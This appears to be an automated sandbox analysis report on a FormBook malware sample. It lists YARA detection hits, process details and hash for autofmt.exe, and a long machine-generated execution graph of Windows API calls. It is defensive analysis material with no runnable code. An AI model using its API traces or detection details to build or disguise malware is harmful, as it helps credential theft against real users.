                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:38
                                                                                                                                                    Start time:09:58:12
                                                                                                                                                    Start date:05/11/2024
                                                                                                                                                    Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\autofmt.exe"
                                                                                                                                                    Imagebase:0x380000
                                                                                                                                                    File size:822'272 bytes
                                                                                                                                                    MD5 hash:C72D80A976B7EB40534E8464957A979F
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Disassembly

                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:9.6%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:10.9%
                                                                                                                                                      Total number of Nodes:1919
                                                                                                                                                      Total number of Limit Nodes:29
                                                                                                                                                      execution_graph 28039 a2e0b0 28040 a2e0c9 28039->28040 28043 a2e850 28040->28043 28044 a2e875 28043->28044 28046 a2e862 28043->28046 28045 a2e0fb 28044->28045 28048 a2e888 SetFilePointer 28044->28048 28046->28045 28052 a29490 109 API calls 28046->28052 28048->28045 28049 a2e8a4 GetLastError 28048->28049 28049->28045 28050 a2e8ae 28049->28050 28050->28045 28053 a29490 109 API calls 28050->28053 28052->28044 28053->28045 28054 a44a07 28055 a44910 28054->28055 28057 a44fce 28055->28057 28083 a44d2c 28057->28083 28059 a44fde 28060 a4503b 28059->28060 28071 a4505f 28059->28071 28061 a44f6c DloadReleaseSectionWriteAccess 8 API calls 28060->28061 28062 a45046 RaiseException 28061->28062 28063 a45234 28062->28063 28063->28055 28064 a450d7 LoadLibraryExA 28065 a45138 28064->28065 28066 a450ea GetLastError 28064->28066 28070 a4514a 28065->28070 28072 a45143 FreeLibrary 28065->28072 28067 a45113 28066->28067 28068 a450fd 28066->28068 28073 a44f6c DloadReleaseSectionWriteAccess 8 API calls 28067->28073 28068->28065 28068->28067 28069 a451a8 GetProcAddress 28074 a451b8 GetLastError 28069->28074 28079 a45206 28069->28079 28070->28069 28070->28079 28071->28064 28071->28065 28071->28070 28071->28079 28072->28070 28076 a4511e RaiseException 28073->28076 28077 a451cb 28074->28077 28076->28063 28078 a44f6c DloadReleaseSectionWriteAccess 8 API calls 28077->28078 28077->28079 28080 a451ec RaiseException 28078->28080 28094 a44f6c 28079->28094 28081 a44d2c ___delayLoadHelper2@8 8 API calls 28080->28081 28082 a45203 28081->28082 28082->28079 28084 a44d5e 28083->28084 28085 a44d38 28083->28085 28084->28059 28102 a44dd5 28085->28102 28087 a44d3d 28088 a44d59 28087->28088 28107 a44efe 28087->28107 28112 a44d5f GetModuleHandleW GetProcAddress GetProcAddress 28088->28112 28091 a44fa7 28092 a44fc3 28091->28092 28093 a44fbf RtlReleaseSRWLockExclusive 28091->28093 28092->28059 28093->28059 28095 a44fa0 28094->28095 28096 a44f7e 28094->28096 28095->28063 28097 a44dd5 DloadReleaseSectionWriteAccess 4 API calls 28096->28097 28098 a44f83 28097->28098 28099 a44f9b 28098->28099 28100 a44efe DloadProtectSection 3 API calls 28098->28100 28115 a44fa2 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 28099->28115 28100->28099 28113 a44d5f GetModuleHandleW GetProcAddress GetProcAddress 28102->28113 28104 a44dda 28105 a44df2 RtlAcquireSRWLockExclusive 28104->28105 28106 a44df6 28104->28106 28105->28087 28106->28087 28108 a44f13 DloadProtectSection 28107->28108 28109 a44f4e VirtualProtect 28108->28109 28110 a44f19 28108->28110 28114 a44e14 VirtualQuery GetSystemInfo 28108->28114 28109->28110 28110->28088 28112->28091 28113->28104 28114->28109 28115->28095 28116 a45680 28117 a45696 _com_error::_com_error 28116->28117 28122 a4734a 28117->28122 28119 a456a4 28120 a44fce ___delayLoadHelper2@8 17 API calls 28119->28120 28121 a456bc 28120->28121 28123 a47364 28122->28123 28124 a47391 RaiseException 28122->28124 28123->28124 28124->28119 28125 a40900 28126 a4090f __EH_prolog3_catch_GS 28125->28126 28371 a21e44 28126->28371 28129 a40940 28135 a40a20 28129->28135 28136 a40951 28129->28136 28178 a4095f 28129->28178 28130 a4125b 28495 a43796 28130->28495 28137 a40ab0 28135->28137 28144 a40a36 28135->28144 28140 a409fc 28136->28140 28141 a4095a 28136->28141 28381 a21ce2 28137->28381 28138 a4128a 28145 a412a3 GetDlgItem SendMessageW 28138->28145 28146 a41293 SendDlgItemMessageW 28138->28146 28139 a4127b SendMessageW 28139->28138 28143 a40a15 EndDialog 28140->28143 28140->28178 28150 a34318 53 API calls 28141->28150 28141->28178 28143->28178 28148 a34318 53 API calls 28144->28148 28514 a31309 28145->28514 28146->28145 28152 a40a53 SetDlgItemTextW 28148->28152 28151 a4098d 28150->28151 28549 a21900 29 API calls __ehhandler$___std_fs_get_file_id@8 28151->28549 28157 a40a5f 28152->28157 28153 a412e3 GetDlgItem 28158 a41302 28153->28158 28155 a40af5 28174 a4113a 28155->28174 28284 a40acb EndDialog 28155->28284 28156 a40b01 GetDlgItem 28162 a40b15 SendMessageW SendMessageW 28156->28162 28163 a40b38 SetFocus 28156->28163 28167 a40a68 GetMessageW 28157->28167 28157->28178 28523 a21e05 28158->28523 28160 a40994 28165 a409a4 28160->28165 28550 a21de7 28160->28550 28162->28163 28168 a40b6f 28163->28168 28169 a40b48 28163->28169 28164 a4130c 28526 a3f2ce GetClassNameW 28164->28526 28165->28178 28553 a219a9 26 API calls 28165->28553 28166 a40ae4 28182 a21a66 26 API calls 28166->28182 28173 a40a7f IsDialogMessageW 28167->28173 28167->28178 28575 a27673 28168->28575 28175 a34318 53 API calls 28169->28175 28173->28157 28179 a40a8e TranslateMessage DispatchMessageW 28173->28179 28180 a34318 53 API calls 28174->28180 28181 a40b52 28175->28181 28554 a45796 28178->28554 28179->28157 28186 a4114b SetDlgItemTextW 28180->28186 28557 a214a7 28181->28557 28182->28178 28191 a41160 28186->28191 28190 a40b88 28196 a34318 53 API calls 28190->28196 28193 a34318 53 API calls 28191->28193 28197 a4117e 28193->28197 28194 a40b6a 28395 a21a66 28194->28395 28195 a41346 28200 a41377 28195->28200 28204 a34318 53 API calls 28195->28204 28199 a40b9f 28196->28199 28202 a214a7 28 API calls 28197->28202 28198 a41d4f 48 API calls 28198->28195 28580 a36a25 28199->28580 28205 a41d4f 48 API calls 28200->28205 28305 a41490 28200->28305 28207 a41187 28202->28207 28210 a41359 SetDlgItemTextW 28204->28210 28211 a4138d 28205->28211 28213 a411f5 28207->28213 28225 a214a7 28 API calls 28207->28225 28208 a41595 28220 a415a0 EnableWindow 28208->28220 28221 a415ad 28208->28221 28215 a34318 53 API calls 28210->28215 28233 a413ad 28211->28233 28258 a413ce 28211->28258 28212 a40be0 28219 a40c07 28212->28219 28584 a2ed0d 28212->28584 28218 a34318 53 API calls 28213->28218 28214 a43572 21 API calls 28222 a40bbb 28214->28222 28216 a4136d SetDlgItemTextW 28215->28216 28216->28200 28224 a411ff 28218->28224 28399 a2eaf3 28219->28399 28220->28221 28228 a415c8 28221->28228 28614 a21cc4 GetDlgItem KiUserCallbackDispatcher 28221->28614 28223 a21a66 26 API calls 28222->28223 28223->28194 28234 a214a7 28 API calls 28224->28234 28235 a411a6 28225->28235 28226 a4147c 28237 a41d4f 48 API calls 28226->28237 28232 a415f0 28228->28232 28249 a415e8 SendMessageW 28228->28249 28231 a41560 28613 a3e265 34 API calls __EH_prolog3_GS 28231->28613 28232->28166 28250 a34318 53 API calls 28232->28250 28611 a3e265 34 API calls __EH_prolog3_GS 28233->28611 28241 a4120b 28234->28241 28244 a34318 53 API calls 28235->28244 28237->28305 28238 a40c2b 28409 a32226 28238->28409 28239 a40c20 GetLastError 28239->28238 28254 a214a7 28 API calls 28241->28254 28242 a415bf 28615 a21cc4 GetDlgItem KiUserCallbackDispatcher 28242->28615 28273 a411b6 28244->28273 28249->28232 28256 a41609 SetDlgItemTextW 28250->28256 28251 a40c01 28587 a3fa79 25 API calls __ehhandler$___std_fs_get_file_id@8 28251->28587 28252 a40c40 28260 a40c5d 28252->28260 28261 a40c4c GetLastError 28252->28261 28253 a41587 28262 a21a66 26 API calls 28253->28262 28263 a41224 28254->28263 28255 a214a7 28 API calls 28255->28305 28256->28166 28258->28226 28259 a41d4f 48 API calls 28258->28259 28264 a41405 28259->28264 28265 a40cfd 28260->28265 28269 a40d0f 28260->28269 28270 a40c79 GetTickCount 28260->28270 28261->28260 28266 a41593 28262->28266 28276 a21a66 26 API calls 28263->28276 28264->28226 28268 a4140e DialogBoxParamW 28264->28268 28265->28269 28271 a41046 28265->28271 28266->28208 28267 a34318 53 API calls 28267->28305 28268->28226 28274 a4142c EndDialog 28268->28274 28272 a40f94 28269->28272 28588 a313f9 28269->28588 28412 a2325c 28270->28412 28444 a21e1f GetDlgItem ShowWindow 28271->28444 28272->28284 28609 a29733 28 API calls _wcslen 28272->28609 28279 a21a66 26 API calls 28273->28279 28274->28178 28280 a41448 28274->28280 28282 a41243 28276->28282 28287 a411e9 28279->28287 28280->28178 28612 a219a9 26 API calls 28280->28612 28289 a21a66 26 API calls 28282->28289 28283 a4105b 28445 a21e1f GetDlgItem ShowWindow 28283->28445 28284->28166 28286 a40d39 28599 a3505a 114 API calls 28286->28599 28293 a21a66 26 API calls 28287->28293 28296 a4124e 28289->28296 28291 a40fae 28304 a34318 53 API calls 28291->28304 28293->28213 28295 a40c9f 28299 a21a66 26 API calls 28295->28299 28300 a21a66 26 API calls 28296->28300 28297 a41064 28446 a34318 28297->28446 28298 a40d51 28309 a36a25 53 API calls 28298->28309 28302 a40cab 28299->28302 28300->28166 28422 a2de9a 28302->28422 28307 a40fd4 28304->28307 28305->28208 28305->28231 28305->28255 28305->28267 28308 a21a66 26 API calls 28305->28308 28314 a21a66 26 API calls 28307->28314 28308->28305 28323 a40d80 GetCommandLineW 28309->28323 28310 a41082 SetDlgItemTextW GetDlgItem 28312 a410b7 28310->28312 28313 a4109f GetWindowLongW SetWindowLongW 28310->28313 28451 a41d4f 28312->28451 28313->28312 28317 a40fea 28314->28317 28321 a21a66 26 API calls 28317->28321 28318 a40cd5 GetLastError 28319 a40ce0 28318->28319 28435 a2ddc7 28319->28435 28326 a40ff6 28321->28326 28336 a40e05 _wcslen 28323->28336 28325 a41d4f 48 API calls 28328 a410ce 28325->28328 28335 a34318 53 API calls 28326->28335 28481 a43c78 28328->28481 28330 a21a66 26 API calls 28330->28265 28333 a40e23 28601 a40405 5 API calls 2 library calls 28333->28601 28334 a41d4f 48 API calls 28346 a410ef 28334->28346 28338 a4100c 28335->28338 28600 a40405 5 API calls 2 library calls 28336->28600 28341 a214a7 28 API calls 28338->28341 28339 a40e2f 28602 a40405 5 API calls 2 library calls 28339->28602 28340 a41110 28610 a21cc4 GetDlgItem KiUserCallbackDispatcher 28340->28610 28344 a41015 28341->28344 28350 a21a66 26 API calls 28344->28350 28345 a40e3b 28603 a35109 114 API calls 28345->28603 28346->28340 28348 a41d4f 48 API calls 28346->28348 28348->28340 28349 a40e4e 28604 a43e53 28 API calls __EH_prolog3 28349->28604 28352 a41031 28350->28352 28356 a21a66 26 API calls 28352->28356 28353 a40e6b CreateFileMappingW 28354 a40ed5 ShellExecuteExW 28353->28354 28355 a40e9d MapViewOfFile 28353->28355 28358 a40ef3 28354->28358 28357 a40ed2 __InternalCxxFrameHandler 28355->28357 28356->28284 28357->28354 28359 a40f00 WaitForInputIdle 28358->28359 28360 a40f3d 28358->28360 28361 a40f1e 28359->28361 28363 a40f60 UnmapViewOfFile CloseHandle 28360->28363 28364 a40f73 28360->28364 28361->28360 28362 a40f23 Sleep 28361->28362 28362->28360 28362->28361 28363->28364 28605 a22e8b 28364->28605 28367 a21a66 26 API calls 28368 a40f83 28367->28368 28369 a21a66 26 API calls 28368->28369 28370 a40f8e 28369->28370 28370->28272 28372 a21ea6 28371->28372 28373 a21e4d 28371->28373 28617 a33e83 GetWindowLongW SetWindowLongW 28372->28617 28375 a21eb3 28373->28375 28616 a33eaa 64 API calls 3 library calls 28373->28616 28375->28129 28375->28130 28375->28178 28377 a21e6f 28377->28375 28378 a21e82 GetDlgItem 28377->28378 28378->28375 28379 a21e92 28378->28379 28379->28375 28380 a21e98 SetWindowTextW 28379->28380 28380->28375 28618 a457d8 28381->28618 28383 a21cee GetDlgItem 28384 a21d0b 28383->28384 28385 a21d1d 28383->28385 28386 a214a7 28 API calls 28384->28386 28619 a21d64 28385->28619 28388 a21d18 28386->28388 28389 a21d4d 28388->28389 28390 a21a66 26 API calls 28388->28390 28391 a21d5a 28389->28391 28392 a21a66 26 API calls 28389->28392 28390->28389 28630 a45787 28391->28630 28392->28391 28396 a21a80 28395->28396 28397 a21a71 28395->28397 28396->28212 28583 a43d64 26 API calls __EH_prolog3_GS 28396->28583 28398 a212a7 26 API calls 28397->28398 28398->28396 28406 a2eaff __EH_prolog3_GS 28399->28406 28400 a45787 5 API calls 28401 a2ebb6 28400->28401 28401->28238 28401->28239 28402 a2eb84 28403 a2efef 54 API calls 28402->28403 28405 a2eb09 28402->28405 28403->28405 28405->28400 28406->28402 28406->28405 28408 a21a66 26 API calls 28406->28408 28648 a2769f 28406->28648 28655 a2efef 28406->28655 28408->28406 28410 a32232 SetCurrentDirectoryW 28409->28410 28411 a32230 28409->28411 28410->28252 28411->28410 28413 a23280 28412->28413 28811 a22f0f 28413->28811 28416 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28417 a2329d 28416->28417 28418 a22f45 28417->28418 28419 a22f55 _wcslen 28418->28419 28815 a25962 28419->28815 28421 a22f63 28421->28295 28423 a2dea6 __EH_prolog3_GS 28422->28423 28424 a2def4 28423->28424 28425 a2df09 CreateFileW 28423->28425 28426 a2df9e 28424->28426 28427 a3169a 47 API calls 28424->28427 28425->28424 28429 a45787 5 API calls 28426->28429 28428 a2df49 28427->28428 28430 a2df6e 28428->28430 28432 a2df56 28428->28432 28433 a2df59 CreateFileW 28428->28433 28431 a2dfdf 28429->28431 28430->28426 28824 a219a9 26 API calls 28430->28824 28431->28318 28431->28319 28432->28433 28433->28430 28436 a2ddf8 28435->28436 28443 a2de09 28435->28443 28438 a2de04 28436->28438 28439 a2de0b 28436->28439 28436->28443 28437 a21a66 26 API calls 28440 a2de18 28437->28440 28825 a2dfe2 28438->28825 28830 a2de50 28439->28830 28440->28330 28443->28437 28444->28283 28445->28297 28447 a34328 28446->28447 28851 a34349 28447->28851 28450 a21e1f GetDlgItem ShowWindow 28450->28310 28467 a41d5e __EH_prolog3_GS 28451->28467 28453 a4349a 28454 a21a66 26 API calls 28453->28454 28455 a434a5 28454->28455 28456 a45787 5 API calls 28455->28456 28457 a410c5 28456->28457 28457->28325 28458 a2769f 45 API calls 28458->28467 28459 a225a4 26 API calls 28459->28467 28461 a214a7 28 API calls 28461->28467 28462 a3645a 28 API calls 28462->28467 28465 a434ad 28883 a258cb 45 API calls 28465->28883 28467->28453 28467->28458 28467->28459 28467->28461 28467->28462 28467->28465 28468 a21a66 26 API calls 28467->28468 28878 a362cd 30 API calls 2 library calls 28467->28878 28879 a3f5b2 28 API calls 28467->28879 28880 a2adaa CompareStringW 28467->28880 28881 a444c0 26 API calls 28467->28881 28882 a4030a 28 API calls 28467->28882 28468->28467 28482 a43c87 __EH_prolog3_catch_GS _wcslen 28481->28482 28884 a36a89 28482->28884 28484 a43cba 28888 a27903 28484->28888 28493 a45796 5 API calls 28494 a410e0 28493->28494 28494->28334 29799 a3eaa6 28495->29799 28498 a437bf GetWindow 28499 a43885 28498->28499 28500 a437d8 28498->28500 28501 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28499->28501 28500->28499 28503 a437e5 GetClassNameW 28500->28503 28505 a4386d GetWindow 28500->28505 28506 a43809 GetWindowLongW 28500->28506 28502 a41266 28501->28502 28502->28138 28502->28139 29804 a38da4 CompareStringW 28503->29804 28505->28499 28505->28500 28506->28505 28507 a43819 SendMessageW 28506->28507 28507->28505 28508 a4382f GetObjectW 28507->28508 29805 a3eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28508->29805 28510 a43846 29806 a3eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28510->29806 29807 a3ef21 13 API calls __ehhandler$___std_fs_get_file_id@8 28510->29807 28513 a43857 SendMessageW DeleteObject 28513->28505 29810 a457a5 28514->29810 28516 a31315 GetCurrentDirectoryW 28517 a31327 28516->28517 28520 a31323 28516->28520 29811 a21bbd 28 API calls 28517->29811 28519 a31339 GetCurrentDirectoryW 28521 a31356 _wcslen 28519->28521 28520->28153 28521->28520 28522 a212a7 26 API calls 28521->28522 28522->28520 28524 a21e11 SetWindowTextW 28523->28524 28525 a21e0f 28523->28525 28524->28164 28525->28524 28527 a3f2f9 28526->28527 28528 a3f31e 28526->28528 29812 a38da4 CompareStringW 28527->29812 28531 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28528->28531 28530 a3f30c 28530->28528 28532 a3f310 FindWindowExW 28530->28532 28533 a3f337 28531->28533 28532->28528 28534 a3fdd1 28533->28534 28535 a3fded 28534->28535 28536 a220b0 30 API calls 28535->28536 28537 a3fe27 28536->28537 29813 a22dbb 28537->29813 28540 a3fe43 28542 a2232c 123 API calls 28540->28542 28541 a3fe4c 29820 a2278b 28541->29820 28545 a3fe48 28542->28545 28547 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28545->28547 28546 a2232c 123 API calls 28546->28545 28548 a3fe77 28547->28548 28548->28195 28548->28198 28549->28160 28551 a21df3 SetDlgItemTextW 28550->28551 28552 a21df1 28550->28552 28551->28165 28552->28551 28553->28178 28555 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28554->28555 28556 a457a0 28555->28556 28556->28556 28558 a214bd _wcslen 28557->28558 28559 a2120c 28 API calls 28558->28559 28560 a214ca 28559->28560 28561 a43572 28560->28561 29904 a40678 PeekMessageW 28561->29904 28564 a435e4 SendMessageW SendMessageW 28566 a43624 28564->28566 28567 a43643 SendMessageW 28564->28567 28565 a435ac 28570 a435b7 ShowWindow SendMessageW SendMessageW 28565->28570 28566->28567 28568 a4365d SendMessageW SendMessageW 28567->28568 28569 a4365b 28567->28569 28571 a436a2 SendMessageW 28568->28571 28572 a4367f SendMessageW 28568->28572 28569->28568 28570->28564 28573 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28571->28573 28572->28571 28574 a436c0 28573->28574 28574->28194 28576 a2768c 28575->28576 29909 a27430 28576->29909 28578 a27699 28579 a434eb 28 API calls __EH_prolog3_GS 28578->28579 28579->28190 29920 a368d4 28580->29920 28583->28212 28585 a2ed1f 49 API calls 28584->28585 28586 a2ed16 28585->28586 28586->28219 28586->28251 28587->28219 28589 a31405 __EH_prolog3 28588->28589 28590 a456f6 28 API calls 28589->28590 28591 a3140f 28590->28591 28592 a31431 GetModuleFileNameW 28591->28592 28593 a31463 28591->28593 28594 a21be3 28 API calls 28591->28594 28592->28591 28592->28593 28595 a214a7 28 API calls 28593->28595 28594->28591 28596 a3146c 28595->28596 28597 a3147f 28596->28597 28598 a212a7 26 API calls 28596->28598 28597->28286 28598->28597 28599->28298 28600->28333 28601->28339 28602->28345 28603->28349 28604->28353 28606 a22e93 28605->28606 28607 a22ea0 28605->28607 28608 a212a7 26 API calls 28606->28608 28607->28367 28608->28607 28609->28291 28610->28155 28611->28258 28612->28226 28613->28253 28614->28242 28615->28228 28616->28377 28617->28375 28618->28383 28633 a457d8 28619->28633 28621 a21d70 GetWindowTextLengthW 28634 a21bbd 28 API calls 28621->28634 28623 a21dab GetWindowTextW 28624 a214a7 28 API calls 28623->28624 28625 a21dca 28624->28625 28626 a21ddd 28625->28626 28635 a212a7 28625->28635 28628 a45787 5 API calls 28626->28628 28629 a21de4 28628->28629 28629->28388 28640 a45734 28630->28640 28632 a21d61 28632->28155 28632->28156 28632->28284 28633->28621 28634->28623 28636 a212b4 28635->28636 28638 a212c1 28635->28638 28639 a219a9 26 API calls 28636->28639 28638->28626 28639->28638 28641 a4573c 28640->28641 28642 a4573d IsProcessorFeaturePresent 28640->28642 28641->28632 28644 a45bfc 28642->28644 28647 a45bbf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 28644->28647 28646 a45cdf 28646->28632 28647->28646 28649 a276e1 28648->28649 28650 a276bb 28648->28650 28683 a258cb 45 API calls 28649->28683 28674 a2120c 28650->28674 28654 a276db 28654->28406 28658 a2effb __EH_prolog3_GS 28655->28658 28656 a2f02f 28659 a2ed0d 49 API calls 28656->28659 28657 a2f01b CreateDirectoryW 28657->28656 28660 a2f0d0 28657->28660 28658->28656 28658->28657 28661 a2f03b 28659->28661 28662 a2f0df 28660->28662 28727 a2f58b 28660->28727 28663 a2f0e3 GetLastError 28661->28663 28740 a3169a 28661->28740 28667 a45787 5 API calls 28662->28667 28663->28662 28669 a2f100 28667->28669 28668 a2f07d 28673 a2f0ad 28668->28673 28797 a219a9 26 API calls 28668->28797 28669->28406 28670 a2f073 CreateDirectoryW 28670->28668 28671 a2f070 28671->28670 28673->28660 28673->28663 28675 a2127d 28674->28675 28678 a2121d 28674->28678 28691 a21a92 28 API calls std::_Xinvalid_argument 28675->28691 28682 a21228 28678->28682 28684 a212d3 28 API calls Concurrency::cancel_current_task 28678->28684 28680 a21254 28685 a211b8 28680->28685 28682->28654 28684->28680 28686 a211c3 28685->28686 28687 a211cb 28685->28687 28706 a211dd 28686->28706 28689 a211c9 28687->28689 28692 a456f6 28687->28692 28689->28682 28695 a456fb 28692->28695 28694 a45715 28694->28689 28695->28694 28697 a45717 28695->28697 28715 a4d08c 28695->28715 28722 a4e91a 7 API calls 2 library calls 28695->28722 28698 a21a25 Concurrency::cancel_current_task 28697->28698 28700 a45721 28697->28700 28699 a4734a _com_raise_error RaiseException 28698->28699 28701 a21a41 28699->28701 28702 a4734a _com_raise_error RaiseException 28700->28702 28704 a21a5a 28701->28704 28705 a212a7 26 API calls 28701->28705 28703 a46628 28702->28703 28704->28689 28705->28704 28707 a21206 28706->28707 28708 a211e8 28706->28708 28726 a21a25 27 API calls 2 library calls 28707->28726 28710 a456f6 28 API calls 28708->28710 28712 a211ee 28710->28712 28711 a2120b 28713 a211f5 28712->28713 28725 a4ac9e 26 API calls __cftof 28712->28725 28713->28689 28719 a5040e __dosmaperr 28715->28719 28716 a5044c 28724 a501d3 20 API calls __dosmaperr 28716->28724 28718 a50437 RtlAllocateHeap 28718->28719 28720 a5044a 28718->28720 28719->28716 28719->28718 28723 a4e91a 7 API calls 2 library calls 28719->28723 28720->28695 28722->28695 28723->28719 28724->28720 28726->28711 28728 a2f597 __EH_prolog3_GS 28727->28728 28729 a2f5a4 SetFileAttributesW 28728->28729 28730 a2f5b7 28729->28730 28738 a2f622 28729->28738 28732 a3169a 47 API calls 28730->28732 28731 a45787 5 API calls 28733 a2f638 28731->28733 28734 a2f5d7 28732->28734 28733->28662 28735 a2f5f6 28734->28735 28736 a2f5e7 SetFileAttributesW 28734->28736 28737 a2f5e4 28734->28737 28735->28738 28798 a219a9 26 API calls 28735->28798 28736->28735 28737->28736 28738->28731 28741 a316e7 28740->28741 28758 a316e0 28740->28758 28742 a214a7 28 API calls 28741->28742 28745 a316f4 28742->28745 28743 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28744 a2f063 28743->28744 28744->28668 28744->28670 28744->28671 28746 a31711 28745->28746 28747 a317db 28745->28747 28750 a31741 28746->28750 28751 a3171b 28746->28751 28748 a31309 30 API calls 28747->28748 28749 a317fb 28748->28749 28753 a318ed 28749->28753 28760 a31875 28749->28760 28761 a3181f 28749->28761 28764 a2769f 45 API calls 28750->28764 28765 a31739 28750->28765 28799 a30ba6 28 API calls 28751->28799 28753->28765 28810 a219a9 26 API calls 28753->28810 28754 a31729 28800 a225a4 28754->28800 28755 a21a66 26 API calls 28755->28758 28758->28743 28759 a31731 28762 a21a66 26 API calls 28759->28762 28808 a30ba6 28 API calls 28760->28808 28806 a30c41 28 API calls 28761->28806 28762->28765 28768 a31789 28764->28768 28765->28755 28766 a31883 28769 a225a4 26 API calls 28766->28769 28804 a30bf3 28 API calls _wcslen 28768->28804 28772 a3188c 28769->28772 28770 a31838 28807 a21188 28 API calls 28770->28807 28775 a21a66 26 API calls 28772->28775 28774 a3179e 28805 a2aef3 28 API calls 28774->28805 28778 a31894 28775->28778 28776 a31848 28781 a225a4 26 API calls 28776->28781 28809 a30ddb 28 API calls 28778->28809 28779 a317b2 28782 a225a4 26 API calls 28779->28782 28783 a31860 28781->28783 28784 a317be 28782->28784 28785 a21a66 26 API calls 28783->28785 28786 a21a66 26 API calls 28784->28786 28788 a31868 28785->28788 28790 a317c6 28786->28790 28787 a3189c 28789 a2769f 45 API calls 28787->28789 28791 a21a66 26 API calls 28788->28791 28793 a31870 28789->28793 28792 a21a66 26 API calls 28790->28792 28791->28793 28794 a317ce 28792->28794 28796 a21a66 26 API calls 28793->28796 28795 a21a66 26 API calls 28794->28795 28795->28765 28796->28753 28797->28673 28798->28738 28799->28754 28801 a225b2 28800->28801 28802 a225ad 28800->28802 28801->28759 28803 a21a66 26 API calls 28802->28803 28803->28801 28804->28774 28805->28779 28806->28770 28807->28776 28808->28766 28809->28787 28810->28765 28812 a22f2f 28811->28812 28813 a22f26 28811->28813 28814 a2120c 28 API calls 28812->28814 28813->28416 28814->28813 28816 a25975 28815->28816 28817 a25a3a 28815->28817 28821 a25987 28816->28821 28822 a23029 28 API calls 28816->28822 28823 a258cb 45 API calls 28817->28823 28821->28421 28822->28821 28824->28426 28826 a2e015 28825->28826 28827 a2dfeb 28825->28827 28826->28443 28827->28826 28836 a2ec63 28827->28836 28831 a2de5c 28830->28831 28833 a2de76 28830->28833 28831->28833 28834 a2de68 CloseHandle 28831->28834 28832 a2de95 28832->28443 28833->28832 28850 a2925b 109 API calls 28833->28850 28834->28833 28837 a2ec6f __EH_prolog3_GS 28836->28837 28838 a2ec7c DeleteFileW 28837->28838 28839 a2ec8c 28838->28839 28848 a2ecf4 28838->28848 28841 a3169a 47 API calls 28839->28841 28840 a45787 5 API calls 28842 a2e013 28840->28842 28843 a2ecac 28841->28843 28842->28443 28844 a2ecc8 28843->28844 28845 a2ecb9 28843->28845 28846 a2ecbc DeleteFileW 28843->28846 28844->28848 28849 a219a9 26 API calls 28844->28849 28845->28846 28846->28844 28848->28840 28849->28848 28850->28832 28857 a3347b 28851->28857 28854 a34346 SetDlgItemTextW 28854->28450 28855 a3436c LoadStringW 28855->28854 28856 a34383 LoadStringW 28855->28856 28856->28854 28864 a3338e 28857->28864 28860 a334bc 28862 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28860->28862 28863 a334d1 28862->28863 28863->28854 28863->28855 28865 a333c2 28864->28865 28873 a33445 _strncpy 28864->28873 28869 a333e2 28865->28869 28875 a389ed WideCharToMultiByte 28865->28875 28867 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 28868 a33474 28867->28868 28868->28860 28874 a334d5 26 API calls 28868->28874 28872 a33413 28869->28872 28876 a342b2 50 API calls __vsnprintf 28869->28876 28877 a4d097 26 API calls 3 library calls 28872->28877 28873->28867 28874->28860 28875->28869 28876->28872 28877->28873 28878->28467 28879->28467 28880->28467 28881->28467 28882->28467 28885 a36a99 _wcslen 28884->28885 28939 a21be3 28885->28939 28887 a36abb 28887->28484 28889 a36a74 28888->28889 28890 a36a89 28 API calls 28889->28890 28891 a36a86 28890->28891 28892 a2b03d 28891->28892 28893 a2b049 __EH_prolog3_GS 28892->28893 28944 a32815 28893->28944 28895 a2b092 28954 a2b231 28895->28954 28898 a21a66 26 API calls 28899 a2b120 28898->28899 28900 a21a66 26 API calls 28899->28900 28901 a2b128 28900->28901 28902 a456f6 28 API calls 28901->28902 28903 a2b13f 28902->28903 28959 a3a599 28903->28959 28905 a2b172 28906 a45787 5 API calls 28905->28906 28907 a2b179 28906->28907 28908 a2b3e1 28907->28908 28909 a2b3ed __EH_prolog3_GS 28908->28909 28910 a2b478 28909->28910 28913 a2b484 28909->28913 29018 a2f711 28909->29018 28911 a21a66 26 API calls 28910->28911 28911->28913 28918 a2b4e0 28913->28918 28985 a2bc65 28913->28985 28914 a2b529 28915 a45787 5 API calls 28914->28915 28917 a2b543 28915->28917 28920 a2b194 28917->28920 28918->28914 29025 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 28918->29025 29743 a2d6bc 28920->29743 28923 a21a66 26 API calls 28926 a2b1e8 